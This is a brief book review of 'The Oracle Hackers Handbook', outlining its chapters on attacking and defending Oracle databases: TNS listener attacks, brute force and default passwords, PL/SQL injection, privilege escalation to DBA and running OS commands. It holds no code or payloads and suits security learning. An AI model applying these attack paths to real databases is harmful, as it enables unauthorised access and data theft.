Oracle Hackers Handbook Book Review

Hacking and Defending Oracle

The Oracle Hackers Handbook is an depth guide to exploring every technieuq and tool used by black hat hackers to invade and compromise Oracle. Oracle Hackers Handbook shows you the best ways to find the weak spots of Oracle and how to defend Oracle.

The Oracle Hackers Handbook contains 12 chapters and covers topics such as defending the TNS listener, authenticating processes, PL/SQL, triggers, web applications and protecting the network and file system.

Oracle Hackers Handbook starts off by taking you through an overview of the Oracle database and through the basic architecture of Oracle pointing out the listeners and packets.

The following chapters then instruct you on attacking the TNS listener and dispatchers, as well as attacking the authentication process by exploting a buffer overflow or performing a brute force attack. The book even mentions that it’s easy to get in to Oracle by using default usernames and passwords or looking in certain files for passwords.

The chapter on PL/SQL covers SQL injection attacks and how to wrap your PL/SQL code for better protection. This chapter also includes real world examples of PL/SQL coding and how to exploit it. Just like PL/SQL, triggers which contain PL/SQL are also given their own chapter and the book discusses how to exploit triggers in the database.

Indirect Privilege Escalation covers how some privileges can be abused to gain DBA privileges, such as getting DBA from CREATE ANY TRIGGER, DBA from CREATE ANY VIEW, DBA from EXECUTE ANY PROCEDURE and DBA from just CREATE PROCEDURE.

The chapter on attacking web PL/SQL applications first shows you how to find out that Oracle Portal is running and what to look for, and then how to attack the PL/SQL Gateway by way of OWA commands and SQL injection in the browser url.

The last couple of chapters discuss how to run OS commands through PL/SQL, Java, ALTER SYSTEM command and using the DBMS_SCHEDULER. There is also help on gaining access and protecting your system when using the UTL_FILE package.

The appendix in the book lists all the default usernames and passwords ever created across all the versions of the Oracle database.

At 150 pages Oracle Hackers Handbook is not a large book, but it is very informative if you want to learn how to hack Oracle or how hackers may try to hack your database and how to stop them.